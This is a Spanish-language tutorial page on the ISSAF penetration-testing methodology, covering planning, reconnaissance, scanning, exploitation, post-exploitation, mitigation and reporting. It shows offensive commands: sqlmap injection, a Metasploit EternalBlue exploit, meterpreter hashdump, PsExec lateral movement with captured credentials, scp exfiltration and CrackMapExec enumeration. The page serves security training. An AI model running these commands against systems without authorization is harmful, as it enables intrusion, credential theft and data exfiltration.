Metodología ISSAF

🛡️ Metodología ISSAF (Information Systems Security Assessment Framework)

ISSAF es un marco integral diseñado para garantizar que las pruebas de penetración y evaluaciones de seguridad sean eficientes y aborden todos los aspectos críticos de la infraestructura tecnológica. Esta metodología es ideal para evaluaciones tanto técnicas como de gestión.

📋 Etapas de la Metodología ISSAF

ISSAF se compone de varias fases estructuradas que aseguran un enfoque completo:

1. Planificación 🗂️

Objetivo: Definir el alcance, los objetivos y las reglas de la evaluación.
Acciones clave:
- Reunirse con las partes interesadas para entender los requisitos.
- Establecer acuerdos de confidencialidad (NDA) y permisos.

Ejemplo: Crear un documento de planificación:

Alcance: Aplicaciones web internas y externas.
No atacar: Servidores de producción críticos.
Horario: 9:00 a 18:00.

Documentación: Asegúrate de incluir acuerdos como las reglas de engagement (RoE).

2. Reconocimiento (Recopilación de Información) 🕵️

Objetivo: Obtener información pasiva y activa sobre los sistemas objetivo.
Técnicas:
- Reconocimiento pasivo:
  - Buscar información pública en redes sociales, registros DNS y motores de búsqueda.
  - Herramienta: theHarvester:
    theHarvester -d example.com -b all
- Reconocimiento activo:
  - Escanear redes y sistemas para identificar puertos abiertos y servicios.
  - Herramienta: nmap:
    nmap -sS -sV -oN scan_results.txt example.com

3. Mapeo de Infraestructura y Análisis 🔍

Objetivo: Comprender la arquitectura del sistema objetivo.
Pasos clave:
- Identificar tecnologías utilizadas en las aplicaciones web.
- Analizar configuraciones de servidores y servicios.
Ejemplo práctico: Utilizar Wappalyzer o extensiones del navegador para detectar frameworks y tecnologías web.

4. Evaluación de Vulnerabilidades (Scanning) 🚨

Objetivo: Identificar vulnerabilidades conocidas en los sistemas y aplicaciones.
Herramientas recomendadas:
- OpenVAS: Escaneo de vulnerabilidades.
  openvas-start
- Nessus: Para obtener informes detallados.
  nessus-cli scan start

5. Explotación (Ataque) 💥

Objetivo: Validar las vulnerabilidades detectadas explotándolas de forma controlada.

Ejemplo práctico:

SQL Injection: Usar sqlmap:

sqlmap -u "<https://example.com?id=1>" --dbs

Explotación de SMB con Metasploit:

msfconsole
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS <IP>
run

6. Post-Explotación (Impacto y Movimientos Laterales) 🖥️

Objetivo: Evaluar el alcance y la gravedad del acceso obtenido, identificar datos sensibles, recursos críticos y evaluar posibles movimientos laterales dentro de la red.
Tareas clave:
1. Recopilación de información interna:
  - Enumerar usuarios, grupos y permisos del sistema comprometido.
  - Extraer credenciales o hashes almacenados.
  - Herramienta: meterpreter en Metasploit:
    meterpreter > sysinfo meterpreter > hashdump
2. Movimientos laterales:
  - Intentar acceder a otros sistemas en la red mediante las credenciales obtenidas.
  - Herramienta: PsExec en Metasploit:
    use exploit/windows/smb/psexec set RHOSTS <IP> set SMBUser <usuario> set SMBPass <contraseña> run
3. Exfiltración de datos:
  - Analizar y transferir datos sensibles (si está permitido en el alcance).
  - Herramienta: scp o exfiltration scripts.
    scp usuario@servidor:/ruta/datos_sensibles .
Consideraciones:
- Evitar dañar la infraestructura.
- Documentar cada acción realizada para el informe final.

7. Análisis y Mitigación de Vulnerabilidades 🔧

Objetivo: Proponer soluciones para corregir las vulnerabilidades explotadas y mejorar la seguridad general del sistema.
Pasos clave:
1. Análisis de causas raíz:
  - Determinar por qué la vulnerabilidad existía.
  - Evaluar si los controles de seguridad son insuficientes o inexistentes.
2. Recomendaciones:
  - Parches para software vulnerable.
  - Fortalecimiento de configuraciones.
  - Implementación de controles adicionales, como IDS/IPS.
Ejemplo práctico:
Si una inyección SQL fue explotada, recomendar:
- Uso de consultas preparadas (Prepared Statements).
- Validación de entradas de usuario en el backend.

8. Informe Final y Presentación 📄

Objetivo: Documentar todos los hallazgos, el impacto de las vulnerabilidades explotadas y las recomendaciones para mitigarlas.
Estructura del informe:
1. Resumen Ejecutivo:
  - Resumen de los hallazgos principales y su impacto en términos de negocio.
2. Metodología:
  - Descripción de las herramientas y técnicas utilizadas.
3. Hallazgos Técnicos:
  - Detalles de las vulnerabilidades, con evidencia.
  - Clasificación según CVSS (Common Vulnerability Scoring System).
4. Recomendaciones:
  - Acciones específicas para mitigar cada vulnerabilidad.

Ejemplo de formato:

Vulnerabilidad: SQL Injection
Impacto: Acceso a la base de datos principal.
Evidencia: Captura de pantalla del ataque exitoso.
Recomendación: Implementar consultas parametrizadas y sanitizar entradas.

Consejo: Incluir gráficos o tablas para resumir los riesgos.

🌐 Recursos Adicionales

Documentación oficial de ISSAF:
Aunque ISSAF ya no se actualiza oficialmente, puedes encontrar información valiosa en sitios de referencia de ciberseguridad.
Herramientas recomendadas:
- Kali Linux (plataforma con herramientas integradas).
- OWASP ZAP (para pruebas de aplicaciones web).

🤓 Ejemplo práctico: Movimientos laterales con CrackMapExec

crackmapexec smb <IP_RANGO> -u usuario -p contraseña --shares

Explicación:
- Escanea recursos compartidos (shares) en una red.
- Permite detectar posibles vectores para movimientos laterales.

AnteriorMetodología PTES SiguienteMetodología OSSTMM

Última actualización hace 1 año

hashtag🛡️ Metodología ISSAF (Information Systems Security Assessment Framework)

hashtag📋 Etapas de la Metodología ISSAF

hashtag1. Planificación 🗂️

hashtag2. Reconocimiento (Recopilación de Información) 🕵️

hashtag3. Mapeo de Infraestructura y Análisis 🔍

hashtag4. Evaluación de Vulnerabilidades (Scanning) 🚨

hashtag5. Explotación (Ataque) 💥

hashtag6. Post-Explotación (Impacto y Movimientos Laterales) 🖥️

hashtag7. Análisis y Mitigación de Vulnerabilidades 🔧

hashtag8. Informe Final y Presentación 📄

hashtag🌐 Recursos Adicionales

hashtag🤓 Ejemplo práctico: Movimientos laterales con CrackMapExec